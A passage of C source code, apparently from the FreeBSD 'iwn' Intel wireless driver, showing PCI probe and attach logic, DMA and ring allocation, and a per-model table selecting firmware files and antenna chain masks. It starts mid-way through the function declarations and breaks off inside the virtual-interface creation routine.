struct ieee80211_rx_ampdu *); static int iwn_addba_request(struct ieee80211_node *, struct ieee80211_tx_ampdu *, int, int, int); static int iwn_addba_response(struct ieee80211_node *, struct ieee80211_tx_ampdu *, int, int, int); static int iwn_ampdu_tx_start(struct ieee80211com *, struct ieee80211_node *, uint8_t); static void iwn_ampdu_tx_stop(struct ieee80211_node *, struct ieee80211_tx_ampdu *); static void iwn4965_ampdu_tx_start(struct iwn_softc *, struct ieee80211_node *, int, uint8_t, uint16_t); static void iwn4965_ampdu_tx_stop(struct iwn_softc *, int, uint8_t, uint16_t); static void iwn5000_ampdu_tx_start(struct iwn_softc *, struct ieee80211_node *, int, uint8_t, uint16_t); static void iwn5000_ampdu_tx_stop(struct iwn_softc *, int, uint8_t, uint16_t); static int iwn5000_query_calibration(struct iwn_softc *); static int iwn5000_send_calibration(struct iwn_softc *); static int iwn5000_send_wimax_coex(struct iwn_softc *); static int iwn5000_crystal_calib(struct iwn_softc *); static int iwn5000_temp_offset_calib(struct iwn_softc *); static int iwn5000_temp_offset_calibv2(struct iwn_softc *); static int iwn4965_post_alive(struct iwn_softc *); static int iwn5000_post_alive(struct iwn_softc *); static int iwn4965_load_bootcode(struct iwn_softc *, const uint8_t *, int); static int iwn4965_load_firmware(struct iwn_softc *); static int iwn5000_load_firmware_section(struct iwn_softc *, uint32_t, const uint8_t *, int); static int iwn5000_load_firmware(struct iwn_softc *); static int iwn_read_firmware_leg(struct iwn_softc *, struct iwn_fw_info *); static int iwn_read_firmware_tlv(struct iwn_softc *, struct iwn_fw_info *, uint16_t); static int iwn_read_firmware(struct iwn_softc *); static int iwn_clock_wait(struct iwn_softc *); static int iwn_apm_init(struct iwn_softc *); static void iwn_apm_stop_master(struct iwn_softc *); static void iwn_apm_stop(struct iwn_softc *); static int iwn4965_nic_config(struct iwn_softc *); static int iwn5000_nic_config(struct iwn_softc *); static int iwn_hw_prepare(struct iwn_softc *); static int iwn_hw_init(struct iwn_softc *); static void iwn_hw_stop(struct iwn_softc *); static void iwn_radio_on(void *, int); static void iwn_radio_off(void *, int); static void iwn_init_locked(struct iwn_softc *); static void iwn_init(void *); static void iwn_stop_locked(struct iwn_softc *); static void iwn_stop(struct iwn_softc *); static void iwn_scan_start(struct ieee80211com *); static void iwn_scan_end(struct ieee80211com *); static void iwn_set_channel(struct ieee80211com *); static void iwn_scan_curchan(struct ieee80211_scan_state *, unsigned long); static void iwn_scan_mindwell(struct ieee80211_scan_state *); static void iwn_hw_reset(void *, int); #ifdef IWN_DEBUG static char *iwn_get_csr_string(int); static void iwn_debug_register(struct iwn_softc *); #endif static device_method_t iwn_methods[] = { /* Device interface */ DEVMETHOD(device_probe, iwn_probe), DEVMETHOD(device_attach, iwn_attach), DEVMETHOD(device_detach, iwn_detach), DEVMETHOD(device_shutdown, iwn_shutdown), DEVMETHOD(device_suspend, iwn_suspend), DEVMETHOD(device_resume, iwn_resume), DEVMETHOD_END }; static driver_t iwn_driver = { "iwn", iwn_methods, sizeof(struct iwn_softc) }; static devclass_t iwn_devclass; DRIVER_MODULE(iwn, pci, iwn_driver, iwn_devclass, NULL, NULL); MODULE_VERSION(iwn, 1); MODULE_DEPEND(iwn, firmware, 1, 1, 1); MODULE_DEPEND(iwn, pci, 1, 1, 1); MODULE_DEPEND(iwn, wlan, 1, 1, 1); static int iwn_probe(device_t dev) { const struct iwn_ident *ident; for (ident = iwn_ident_table; ident->name 
!= NULL; ident++) { if (pci_get_vendor(dev) == ident->vendor && pci_get_device(dev) == ident->device) { device_set_desc(dev, ident->name); return (BUS_PROBE_DEFAULT); } } return ENXIO; } static int iwn_attach(device_t dev) { struct iwn_softc *sc = (struct iwn_softc *)device_get_softc(dev); struct ieee80211com *ic; struct ifnet *ifp; int i, error, rid; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; #ifdef IWN_DEBUG error = resource_int_value(device_get_name(sc->sc_dev), device_get_unit(sc->sc_dev), "debug", &(sc->sc_debug)); if (error != 0) sc->sc_debug = 0; #else sc->sc_debug = 0; #endif DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: begin\n",__func__); /* * Get the offset of the PCI Express Capability Structure in PCI * Configuration Space. */ error = pci_find_cap(dev, PCIY_EXPRESS, &sc->sc_cap_off); if (error != 0) { device_printf(dev, "PCIe capability structure not found!\n"); return error; } /* Clear device-specific "PCI retry timeout" register (41h). */ pci_write_config(dev, 0x41, 0, 1); /* Enable bus-mastering. */ pci_enable_busmaster(dev); rid = PCIR_BAR(0); sc->mem = bus_alloc_resource_any(dev, SYS_RES_MEMORY, &rid, RF_ACTIVE); if (sc->mem == NULL) { device_printf(dev, "can't map mem space\n"); error = ENOMEM; return error; } sc->sc_st = rman_get_bustag(sc->mem); sc->sc_sh = rman_get_bushandle(sc->mem); i = 1; rid = 0; if (pci_alloc_msi(dev, &i) == 0) rid = 1; /* Install interrupt handler. */ sc->irq = bus_alloc_resource_any(dev, SYS_RES_IRQ, &rid, RF_ACTIVE | (rid != 0 ? 0 : RF_SHAREABLE)); if (sc->irq == NULL) { device_printf(dev, "can't map interrupt\n"); error = ENOMEM; goto fail; } IWN_LOCK_INIT(sc); /* Read hardware revision and attach. */ sc->hw_type = (IWN_READ(sc, IWN_HW_REV) >> IWN_HW_REV_TYPE_SHIFT) & IWN_HW_REV_TYPE_MASK; sc->subdevice_id = pci_get_subdevice(dev); /* * 4965 versus 5000 and later have different methods. * Let's set those up first. */ if (sc->hw_type == IWN_HW_REV_TYPE_4965) error = iwn4965_attach(sc, pci_get_device(dev)); else error = iwn5000_attach(sc, pci_get_device(dev)); if (error != 0) { device_printf(dev, "could not attach device, error %d\n", error); goto fail; } /* * Next, let's setup the various parameters of each NIC. */ error = iwn_config_specific(sc, pci_get_device(dev)); if (error != 0) { device_printf(dev, "could not attach device, error %d\n", error); goto fail; } if ((error = iwn_hw_prepare(sc)) != 0) { device_printf(dev, "hardware not ready, error %d\n", error); goto fail; } /* Allocate DMA memory for firmware transfers. */ if ((error = iwn_alloc_fwmem(sc)) != 0) { device_printf(dev, "could not allocate memory for firmware, error %d\n", error); goto fail; } /* Allocate "Keep Warm" page. */ if ((error = iwn_alloc_kw(sc)) != 0) { device_printf(dev, "could not allocate keep warm page, error %d\n", error); goto fail; } /* Allocate ICT table for 5000 Series. */ if (sc->hw_type != IWN_HW_REV_TYPE_4965 && (error = iwn_alloc_ict(sc)) != 0) { device_printf(dev, "could not allocate ICT table, error %d\n", error); goto fail; } /* Allocate TX scheduler "rings". */ if ((error = iwn_alloc_sched(sc)) != 0) { device_printf(dev, "could not allocate TX scheduler rings, error %d\n", error); goto fail; } /* Allocate TX rings (16 on 4965AGN, 20 on >=5000). */ for (i = 0; i < sc->ntxqs; i++) { if ((error = iwn_alloc_tx_ring(sc, &sc->txq[i], i)) != 0) { device_printf(dev, "could not allocate TX ring %d, error %d\n", i, error); goto fail; } } /* Allocate RX ring. 
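 * Each RX descriptor is a single 32-bit word carrying the physical address
 * of its receive buffer shifted right by 8 bits, so the buffers handed to
 * the firmware are 256-byte aligned; see iwn_alloc_rx_ring() below.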
*/ if ((error = iwn_alloc_rx_ring(sc, &sc->rxq)) != 0) { device_printf(dev, "could not allocate RX ring, error %d\n", error); goto fail; } /* Clear pending interrupts. */ IWN_WRITE(sc, IWN_INT, 0xffffffff); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(dev, "can not allocate ifnet structure\n"); goto fail; } ic = ifp->if_l2com; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* default to BSS mode */ /* Set device capabilities. */ ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_MONITOR /* monitor mode supported */ | IEEE80211_C_BGSCAN /* background scanning */ | IEEE80211_C_TXPMGT /* tx power management */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_WPA | IEEE80211_C_SHPREAMBLE /* short preamble supported */ #if 0 | IEEE80211_C_IBSS /* ibss/adhoc mode */ #endif | IEEE80211_C_WME /* WME */ | IEEE80211_C_PMGT /* Station-side power mgmt */ ; /* Read MAC address, channels, etc from EEPROM. */ if ((error = iwn_read_eeprom(sc, macaddr)) != 0) { device_printf(dev, "could not read EEPROM, error %d\n", error); goto fail; } /* Count the number of available chains. */ sc->ntxchains = ((sc->txchainmask >> 2) & 1) + ((sc->txchainmask >> 1) & 1) + ((sc->txchainmask >> 0) & 1); sc->nrxchains = ((sc->rxchainmask >> 2) & 1) + ((sc->rxchainmask >> 1) & 1) + ((sc->rxchainmask >> 0) & 1); if (bootverbose) { device_printf(dev, "MIMO %dT%dR, %.4s, address %6D\n", sc->ntxchains, sc->nrxchains, sc->eeprom_domain, macaddr, ":"); } if (sc->sc_flags & IWN_FLAG_HAS_11N) { ic->ic_rxstream = sc->nrxchains; ic->ic_txstream = sc->ntxchains; /* * The NICs we currently support cap out at 2x2 support * separate from the chains being used. * * This is a total hack to work around that until some * per-device method is implemented to return the * actual stream support. * * XXX Note: the 5350 is a 3x3 device; so we shouldn't * cap this! But, anything that touches rates in the * driver needs to be audited first before 3x3 is enabled. 
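 * For now both ic_rxstream and ic_txstream are simply clamped to 2 below.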
*/ if (ic->ic_rxstream > 2) ic->ic_rxstream = 2; if (ic->ic_txstream > 2) ic->ic_txstream = 2; ic->ic_htcaps = IEEE80211_HTCAP_SMPS_OFF /* SMPS mode disabled */ | IEEE80211_HTCAP_SHORTGI20 /* short GI in 20MHz */ | IEEE80211_HTCAP_CHWIDTH40 /* 40MHz channel width*/ | IEEE80211_HTCAP_SHORTGI40 /* short GI in 40MHz */ #ifdef notyet | IEEE80211_HTCAP_GREENFIELD #if IWN_RBUF_SIZE == 8192 | IEEE80211_HTCAP_MAXAMSDU_7935 /* max A-MSDU length */ #else | IEEE80211_HTCAP_MAXAMSDU_3839 /* max A-MSDU length */ #endif #endif /* s/w capabilities */ | IEEE80211_HTC_HT /* HT operation */ | IEEE80211_HTC_AMPDU /* tx A-MPDU */ #ifdef notyet | IEEE80211_HTC_AMSDU /* tx A-MSDU */ #endif ; } if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_softc = sc; ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = iwn_init; ifp->if_ioctl = iwn_ioctl; ifp->if_start = iwn_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ieee80211_ifattach(ic, macaddr); ic->ic_vap_create = iwn_vap_create; ic->ic_vap_delete = iwn_vap_delete; ic->ic_raw_xmit = iwn_raw_xmit; ic->ic_node_alloc = iwn_node_alloc; sc->sc_ampdu_rx_start = ic->ic_ampdu_rx_start; ic->ic_ampdu_rx_start = iwn_ampdu_rx_start; sc->sc_ampdu_rx_stop = ic->ic_ampdu_rx_stop; ic->ic_ampdu_rx_stop = iwn_ampdu_rx_stop; sc->sc_addba_request = ic->ic_addba_request; ic->ic_addba_request = iwn_addba_request; sc->sc_addba_response = ic->ic_addba_response; ic->ic_addba_response = iwn_addba_response; sc->sc_addba_stop = ic->ic_addba_stop; ic->ic_addba_stop = iwn_ampdu_tx_stop; ic->ic_newassoc = iwn_newassoc; ic->ic_wme.wme_update = iwn_updateedca; ic->ic_update_mcast = iwn_update_mcast; ic->ic_scan_start = iwn_scan_start; ic->ic_scan_end = iwn_scan_end; ic->ic_set_channel = iwn_set_channel; ic->ic_scan_curchan = iwn_scan_curchan; ic->ic_scan_mindwell = iwn_scan_mindwell; ic->ic_setregdomain = iwn_setregdomain; iwn_radiotap_attach(sc); callout_init_mtx(&sc->calib_to, &sc->sc_mtx, 0); callout_init_mtx(&sc->watchdog_to, &sc->sc_mtx, 0); TASK_INIT(&sc->sc_reinit_task, 0, iwn_hw_reset, sc); TASK_INIT(&sc->sc_radioon_task, 0, iwn_radio_on, sc); TASK_INIT(&sc->sc_radiooff_task, 0, iwn_radio_off, sc); iwn_sysctlattach(sc); /* * Hook our interrupt after all initialization is complete. */ error = bus_setup_intr(dev, sc->irq, INTR_TYPE_NET | INTR_MPSAFE, NULL, iwn_intr, sc, &sc->sc_ih); if (error != 0) { device_printf(dev, "can't establish interrupt, error %d\n", error); goto fail; } if (bootverbose) ieee80211_announce(ic); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; fail: iwn_detach(dev); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end in error\n",__func__); return error; } /* * Define specific configuration based on device id and subdevice id * pid : PCI device id */ static int iwn_config_specific(struct iwn_softc *sc, uint16_t pid) { switch (pid) { /* 4965 series */ case IWN_DID_4965_1: case IWN_DID_4965_2: case IWN_DID_4965_3: case IWN_DID_4965_4: sc->base_params = &iwn4965_base_params; sc->limits = &iwn4965_sensitivity_limits; sc->fwname = "iwn4965fw"; /* Override chains masks, ROM is known to be broken. 
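 * Force two TX chains (A+B) and three RX chains (A+B+C) on the 4965
 * instead of trusting the values read from the ROM.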
*/ sc->txchainmask = IWN_ANT_AB; sc->rxchainmask = IWN_ANT_ABC; /* Enable normal btcoex */ sc->sc_flags |= IWN_FLAG_BTCOEX; break; /* 1000 Series */ case IWN_DID_1000_1: case IWN_DID_1000_2: switch(sc->subdevice_id) { case IWN_SDID_1000_1: case IWN_SDID_1000_2: case IWN_SDID_1000_3: case IWN_SDID_1000_4: case IWN_SDID_1000_5: case IWN_SDID_1000_6: case IWN_SDID_1000_7: case IWN_SDID_1000_8: case IWN_SDID_1000_9: case IWN_SDID_1000_10: case IWN_SDID_1000_11: case IWN_SDID_1000_12: sc->limits = &iwn1000_sensitivity_limits; sc->base_params = &iwn1000_base_params; sc->fwname = "iwn1000fw"; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 6x00 Series */ case IWN_DID_6x00_2: case IWN_DID_6x00_4: case IWN_DID_6x00_1: case IWN_DID_6x00_3: sc->fwname = "iwn6000fw"; sc->limits = &iwn6000_sensitivity_limits; switch(sc->subdevice_id) { case IWN_SDID_6x00_1: case IWN_SDID_6x00_2: case IWN_SDID_6x00_8: //iwl6000_3agn_cfg sc->base_params = &iwn_6000_base_params; break; case IWN_SDID_6x00_3: case IWN_SDID_6x00_6: case IWN_SDID_6x00_9: ////iwl6000i_2agn case IWN_SDID_6x00_4: case IWN_SDID_6x00_7: case IWN_SDID_6x00_10: //iwl6000i_2abg_cfg case IWN_SDID_6x00_5: //iwl6000i_2bg_cfg sc->base_params = &iwn_6000i_base_params; sc->sc_flags |= IWN_FLAG_INTERNAL_PA; sc->txchainmask = IWN_ANT_BC; sc->rxchainmask = IWN_ANT_BC; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 6x05 Series */ case IWN_DID_6x05_1: case IWN_DID_6x05_2: switch(sc->subdevice_id) { case IWN_SDID_6x05_1: case IWN_SDID_6x05_4: case IWN_SDID_6x05_6: //iwl6005_2agn_cfg case IWN_SDID_6x05_2: case IWN_SDID_6x05_5: case IWN_SDID_6x05_7: //iwl6005_2abg_cfg case IWN_SDID_6x05_3: //iwl6005_2bg_cfg case IWN_SDID_6x05_8: case IWN_SDID_6x05_9: //iwl6005_2agn_sff_cfg case IWN_SDID_6x05_10: //iwl6005_2agn_d_cfg case IWN_SDID_6x05_11: //iwl6005_2agn_mow1_cfg case IWN_SDID_6x05_12: //iwl6005_2agn_mow2_cfg sc->fwname = "iwn6000g2afw"; sc->limits = &iwn6000_sensitivity_limits; sc->base_params = &iwn_6000g2_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 6x35 Series */ case IWN_DID_6035_1: case IWN_DID_6035_2: switch(sc->subdevice_id) { case IWN_SDID_6035_1: case IWN_SDID_6035_2: case IWN_SDID_6035_3: case IWN_SDID_6035_4: sc->fwname = "iwn6000g2bfw"; sc->limits = &iwn6235_sensitivity_limits; sc->base_params = &iwn_6235_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 6x50 WiFi/WiMax Series */ case IWN_DID_6050_1: case IWN_DID_6050_2: switch(sc->subdevice_id) { case IWN_SDID_6050_1: case IWN_SDID_6050_3: case IWN_SDID_6050_5: //iwl6050_2agn_cfg case IWN_SDID_6050_2: case IWN_SDID_6050_4: case IWN_SDID_6050_6: //iwl6050_2abg_cfg sc->fwname = "iwn6050fw"; sc->txchainmask = IWN_ANT_AB; sc->rxchainmask = IWN_ANT_AB; sc->limits = &iwn6000_sensitivity_limits; sc->base_params = &iwn_6050_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 6150 WiFi/WiMax 
Series */ case IWN_DID_6150_1: case IWN_DID_6150_2: switch(sc->subdevice_id) { case IWN_SDID_6150_1: case IWN_SDID_6150_3: case IWN_SDID_6150_5: // iwl6150_bgn_cfg case IWN_SDID_6150_2: case IWN_SDID_6150_4: case IWN_SDID_6150_6: //iwl6150_bg_cfg sc->fwname = "iwn6050fw"; sc->limits = &iwn6000_sensitivity_limits; sc->base_params = &iwn_6150_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 6030 Series and 1030 Series */ case IWN_DID_x030_1: case IWN_DID_x030_2: case IWN_DID_x030_3: case IWN_DID_x030_4: switch(sc->subdevice_id) { case IWN_SDID_x030_1: case IWN_SDID_x030_3: case IWN_SDID_x030_5: // iwl1030_bgn_cfg case IWN_SDID_x030_2: case IWN_SDID_x030_4: case IWN_SDID_x030_6: //iwl1030_bg_cfg case IWN_SDID_x030_7: case IWN_SDID_x030_10: case IWN_SDID_x030_14: //iwl6030_2agn_cfg case IWN_SDID_x030_8: case IWN_SDID_x030_11: case IWN_SDID_x030_15: // iwl6030_2bgn_cfg case IWN_SDID_x030_9: case IWN_SDID_x030_12: case IWN_SDID_x030_16: // iwl6030_2abg_cfg case IWN_SDID_x030_13: //iwl6030_2bg_cfg sc->fwname = "iwn6000g2bfw"; sc->limits = &iwn6000_sensitivity_limits; sc->base_params = &iwn_6000g2b_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 130 Series WiFi */ /* XXX: This series will need adjustment for rate. * see rx_with_siso_diversity in linux kernel */ case IWN_DID_130_1: case IWN_DID_130_2: switch(sc->subdevice_id) { case IWN_SDID_130_1: case IWN_SDID_130_3: case IWN_SDID_130_5: //iwl130_bgn_cfg case IWN_SDID_130_2: case IWN_SDID_130_4: case IWN_SDID_130_6: //iwl130_bg_cfg sc->fwname = "iwn6000g2bfw"; sc->limits = &iwn6000_sensitivity_limits; sc->base_params = &iwn_6000g2b_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 100 Series WiFi */ case IWN_DID_100_1: case IWN_DID_100_2: switch(sc->subdevice_id) { case IWN_SDID_100_1: case IWN_SDID_100_2: case IWN_SDID_100_3: case IWN_SDID_100_4: case IWN_SDID_100_5: case IWN_SDID_100_6: sc->limits = &iwn1000_sensitivity_limits; sc->base_params = &iwn1000_base_params; sc->fwname = "iwn100fw"; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 2x00 Series */ case IWN_DID_2x00_1: case IWN_DID_2x00_2: switch(sc->subdevice_id) { case IWN_SDID_2x00_1: case IWN_SDID_2x00_2: case IWN_SDID_2x00_3: //iwl2000_2bgn_cfg case IWN_SDID_2x00_4: //iwl2000_2bgn_d_cfg sc->limits = &iwn2030_sensitivity_limits; sc->base_params = &iwn2000_base_params; sc->fwname = "iwn2000fw"; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice) \n", pid, sc->subdevice_id, sc->hw_type); return ENOTSUP; } break; /* 2x30 Series */ case IWN_DID_2x30_1: case IWN_DID_2x30_2: switch(sc->subdevice_id) { case IWN_SDID_2x30_1: case IWN_SDID_2x30_3: case IWN_SDID_2x30_5: //iwl100_bgn_cfg case IWN_SDID_2x30_2: case IWN_SDID_2x30_4: case IWN_SDID_2x30_6: //iwl100_bg_cfg sc->limits = &iwn2030_sensitivity_limits; sc->base_params = &iwn2030_base_params; sc->fwname = "iwn2030fw"; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" 
"0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 5x00 Series */ case IWN_DID_5x00_1: case IWN_DID_5x00_2: case IWN_DID_5x00_3: case IWN_DID_5x00_4: sc->limits = &iwn5000_sensitivity_limits; sc->base_params = &iwn5000_base_params; sc->fwname = "iwn5000fw"; switch(sc->subdevice_id) { case IWN_SDID_5x00_1: case IWN_SDID_5x00_2: case IWN_SDID_5x00_3: case IWN_SDID_5x00_4: case IWN_SDID_5x00_9: case IWN_SDID_5x00_10: case IWN_SDID_5x00_11: case IWN_SDID_5x00_12: case IWN_SDID_5x00_17: case IWN_SDID_5x00_18: case IWN_SDID_5x00_19: case IWN_SDID_5x00_20: //iwl5100_agn_cfg sc->txchainmask = IWN_ANT_B; sc->rxchainmask = IWN_ANT_AB; break; case IWN_SDID_5x00_5: case IWN_SDID_5x00_6: case IWN_SDID_5x00_13: case IWN_SDID_5x00_14: case IWN_SDID_5x00_21: case IWN_SDID_5x00_22: //iwl5100_bgn_cfg sc->txchainmask = IWN_ANT_B; sc->rxchainmask = IWN_ANT_AB; break; case IWN_SDID_5x00_7: case IWN_SDID_5x00_8: case IWN_SDID_5x00_15: case IWN_SDID_5x00_16: case IWN_SDID_5x00_23: case IWN_SDID_5x00_24: //iwl5100_abg_cfg sc->txchainmask = IWN_ANT_B; sc->rxchainmask = IWN_ANT_AB; break; case IWN_SDID_5x00_25: case IWN_SDID_5x00_26: case IWN_SDID_5x00_27: case IWN_SDID_5x00_28: case IWN_SDID_5x00_29: case IWN_SDID_5x00_30: case IWN_SDID_5x00_31: case IWN_SDID_5x00_32: case IWN_SDID_5x00_33: case IWN_SDID_5x00_34: case IWN_SDID_5x00_35: case IWN_SDID_5x00_36: //iwl5300_agn_cfg sc->txchainmask = IWN_ANT_ABC; sc->rxchainmask = IWN_ANT_ABC; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 5x50 Series */ case IWN_DID_5x50_1: case IWN_DID_5x50_2: case IWN_DID_5x50_3: case IWN_DID_5x50_4: sc->limits = &iwn5000_sensitivity_limits; sc->base_params = &iwn5000_base_params; sc->fwname = "iwn5000fw"; switch(sc->subdevice_id) { case IWN_SDID_5x50_1: case IWN_SDID_5x50_2: case IWN_SDID_5x50_3: //iwl5350_agn_cfg sc->limits = &iwn5000_sensitivity_limits; sc->base_params = &iwn5000_base_params; sc->fwname = "iwn5000fw"; break; case IWN_SDID_5x50_4: case IWN_SDID_5x50_5: case IWN_SDID_5x50_8: case IWN_SDID_5x50_9: case IWN_SDID_5x50_10: case IWN_SDID_5x50_11: //iwl5150_agn_cfg case IWN_SDID_5x50_6: case IWN_SDID_5x50_7: case IWN_SDID_5x50_12: case IWN_SDID_5x50_13: //iwl5150_abg_cfg sc->limits = &iwn5000_sensitivity_limits; sc->fwname = "iwn5150fw"; sc->base_params = &iwn_5x50_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id : 0x%04x" "rev 0x%08x not supported (device)\n", pid, sc->subdevice_id, sc->hw_type); return ENOTSUP; } return 0; } static int iwn4965_attach(struct iwn_softc *sc, uint16_t pid) { struct iwn_ops *ops = &sc->ops; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); ops->load_firmware = iwn4965_load_firmware; ops->read_eeprom = iwn4965_read_eeprom; ops->post_alive = iwn4965_post_alive; ops->nic_config = iwn4965_nic_config; ops->update_sched = iwn4965_update_sched; ops->get_temperature = iwn4965_get_temperature; ops->get_rssi = iwn4965_get_rssi; ops->set_txpower = iwn4965_set_txpower; ops->init_gains = iwn4965_init_gains; ops->set_gains = iwn4965_set_gains; ops->add_node = iwn4965_add_node; ops->tx_done = iwn4965_tx_done; ops->ampdu_tx_start = iwn4965_ampdu_tx_start; ops->ampdu_tx_stop = 
iwn4965_ampdu_tx_stop; sc->ntxqs = IWN4965_NTXQUEUES; sc->firstaggqueue = IWN4965_FIRSTAGGQUEUE; sc->ndmachnls = IWN4965_NDMACHNLS; sc->broadcast_id = IWN4965_ID_BROADCAST; sc->rxonsz = IWN4965_RXONSZ; sc->schedsz = IWN4965_SCHEDSZ; sc->fw_text_maxsz = IWN4965_FW_TEXT_MAXSZ; sc->fw_data_maxsz = IWN4965_FW_DATA_MAXSZ; sc->fwsz = IWN4965_FWSZ; sc->sched_txfact_addr = IWN4965_SCHED_TXFACT; sc->limits = &iwn4965_sensitivity_limits; sc->fwname = "iwn4965fw"; /* Override chains masks, ROM is known to be broken. */ sc->txchainmask = IWN_ANT_AB; sc->rxchainmask = IWN_ANT_ABC; /* Enable normal btcoex */ sc->sc_flags |= IWN_FLAG_BTCOEX; DPRINTF(sc, IWN_DEBUG_TRACE, "%s: end\n",__func__); return 0; } static int iwn5000_attach(struct iwn_softc *sc, uint16_t pid) { struct iwn_ops *ops = &sc->ops; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); ops->load_firmware = iwn5000_load_firmware; ops->read_eeprom = iwn5000_read_eeprom; ops->post_alive = iwn5000_post_alive; ops->nic_config = iwn5000_nic_config; ops->update_sched = iwn5000_update_sched; ops->get_temperature = iwn5000_get_temperature; ops->get_rssi = iwn5000_get_rssi; ops->set_txpower = iwn5000_set_txpower; ops->init_gains = iwn5000_init_gains; ops->set_gains = iwn5000_set_gains; ops->add_node = iwn5000_add_node; ops->tx_done = iwn5000_tx_done; ops->ampdu_tx_start = iwn5000_ampdu_tx_start; ops->ampdu_tx_stop = iwn5000_ampdu_tx_stop; sc->ntxqs = IWN5000_NTXQUEUES; sc->firstaggqueue = IWN5000_FIRSTAGGQUEUE; sc->ndmachnls = IWN5000_NDMACHNLS; sc->broadcast_id = IWN5000_ID_BROADCAST; sc->rxonsz = IWN5000_RXONSZ; sc->schedsz = IWN5000_SCHEDSZ; sc->fw_text_maxsz = IWN5000_FW_TEXT_MAXSZ; sc->fw_data_maxsz = IWN5000_FW_DATA_MAXSZ; sc->fwsz = IWN5000_FWSZ; sc->sched_txfact_addr = IWN5000_SCHED_TXFACT; sc->reset_noise_gain = IWN5000_PHY_CALIB_RESET_NOISE_GAIN; sc->noise_gain = IWN5000_PHY_CALIB_NOISE_GAIN; return 0; } /* * Attach the interface to 802.11 radiotap. */ static void iwn_radiotap_attach(struct iwn_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), IWN_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), IWN_RX_RADIOTAP_PRESENT); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); } static void iwn_sysctlattach(struct iwn_softc *sc) { #ifdef IWN_DEBUG struct sysctl_ctx_list *ctx = device_get_sysctl_ctx(sc->sc_dev); struct sysctl_oid *tree = device_get_sysctl_tree(sc->sc_dev); SYSCTL_ADD_INT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "debug", CTLFLAG_RW, &sc->sc_debug, sc->sc_debug, "control debugging printfs"); #endif } static struct ieee80211vap * iwn_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct iwn_vap *ivp; struct ieee80211vap *vap; uint8_t mac1[IEEE80211_ADDR_LEN]; struct iwn_softc *sc = ic->ic_ifp->if_softc; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; IEEE80211_ADDR_COPY(mac1, mac); ivp = (struct iwn_vap *) malloc(sizeof(struct iwn_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (ivp == NULL) return NULL; vap = &ivp->iv_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac1); ivp->ctx = IWN_RXON_BSS_CTX; 